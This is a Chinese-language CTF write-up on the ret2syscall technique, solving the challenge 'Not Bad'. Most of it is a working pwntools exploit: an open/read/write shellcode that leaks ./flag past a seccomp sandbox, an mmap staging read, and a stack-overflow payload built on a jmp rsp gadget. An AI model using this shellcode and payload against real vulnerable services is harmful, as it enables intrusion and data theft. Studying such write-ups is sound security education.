ret2syscall是栈溢出里常见的一种手法,如果在x86下有int 80或者在x64中看到syscall,可以考虑利用这种攻击手法
而且现在有些题目出现沙盒,seccomp机制会ban掉一些函数,然后一般会允许使用open,read,write,就可以用读文件方法获取flag
一般如果看到沙盒或者出现syscall可以考虑使用这种攻击手法
[极客大挑战 2019]Not Bad
看上去没有任何保护,栈可写可执行
进入之后发现有这么一个函数
这个时候查看一下可以使用哪些syscall
够用了
首先介绍一下 需要用到的syscall格式
xor rsi ,rsi #这里0代表只读,选择异或是防止出现0字符,有些时候有影响
xor rdx,rdx #这里是读文件,就不需要设置mode,写成0就好
mov rax,0x67616c662f2e;#pwntools的汇编好像不能push太大的,虽然在x64位里面这个是可以放下的 ./flag
push rax;
mov rdi,rsp; #设置为我们字符串的位置
mov rax,2; #代表open
syscall;
由于上一步会返回rax代表fd
mov rdi,rax
mov rsi,rsp #设置保存的位置
mov rdx,0x30
mov rax,0 #read到我们的栈上
syscall
mov rdi,1 #1代表标准输出
mov rsi,rsp
mov rdx,0x30
mov rax,1#写到我们的标准输出来
syscall
在pwntools中,把这些汇编指令编译成机器码很简单,每条指令用;分割
open_flag = """
xor rsi ,rsi ;
xor rdx,rdx;
mov rax,0x67616c662f2e;
push rax;
mov rdi,rsp;
mov rax,2;
syscall;
"""
read_flag = """
mov rdi,rax;
mov rsi,rsp ;
mov rdx,0x30;
mov rax,0;
syscall;
"""
output_flag = """
mov rdi,1 ;
mov rsi,rsp;
mov rdx,0x30;
mov rax,1;
syscall;
"""
shellcode = asm(open_flag + read_flag + output_flag)
这个时候由于可能shellcode太长,需要把shellcode写到mmap分配的地方
mov rdi,0; #标准输入
mov rsi,0x123000;#地址
mov rdx,0x1000;#大小
mov rax,0;#0号也就是read调用
syscall;
mov rax,0x123000;#当执行完read后去执行mem里面执行shellcode
jmp rax;
read_on_mem = """
mov rdi,0;
mov rsi,0x123000;
mov rdx,0x1000;
mov rax,0;
syscall;
mov rax,0x123000;
jmp rax;
"""
jmp_rsp = 0x400A01
payload = (
asm(read_on_mem).ljust(0x28, b"\0") + p64(jmp_rsp) + asm("sub rsp,0x30;jmp rsp;")
)
print(len(payload))
debug()
sla(b"have fun!", payload)
it()
可以看到红色的是返回地址,我们覆盖成了jmp rsp
由于当我们ret之后,会把返回地址pop出来,这个时候rsp,指向我们的shellcode,然后jmp rsp,就会把程序劫持到我们的栈上负责跳转的部分
sub rsp是调整栈指针,让我们可以回到之前真正要执行的部分
等待输入
read_on_mem = """
mov rdi,0;
mov rsi,0x123000;
mov rdx,0x1000;
mov rax,0;
syscall;
mov rax,0x123000;
jmp rax;
"""
jmp_rsp = 0x400A01
payload = (
asm(read_on_mem).ljust(0x28, b"\0") + p64(jmp_rsp) + asm("sub rsp,0x30;jmp rsp;")
)
sla(b"have fun!", payload)
open_flag = """
xor rsi ,rsi ;
xor rdx,rdx;
mov rax,0x67616c662f2e;
push rax;
mov rdi,rsp;
mov rax,2;
syscall;
"""
read_flag = """
mov rdi,rax;
mov rsi,rsp ;
mov rdx,0x30;
mov rax,0;
syscall;
"""
output_flag = """
mov rdi,1 ;
mov rsi,rsp;
mov rdx,0x30;
mov rax,1;
syscall;
"""
sla(b"Baddd!\n", asm(open_flag + read_flag + output_flag))
it()
可以直接打远程了
这个里面最大的难点其实不是写shellcode,而是利用jmp rsp达到指令回到栈上的效果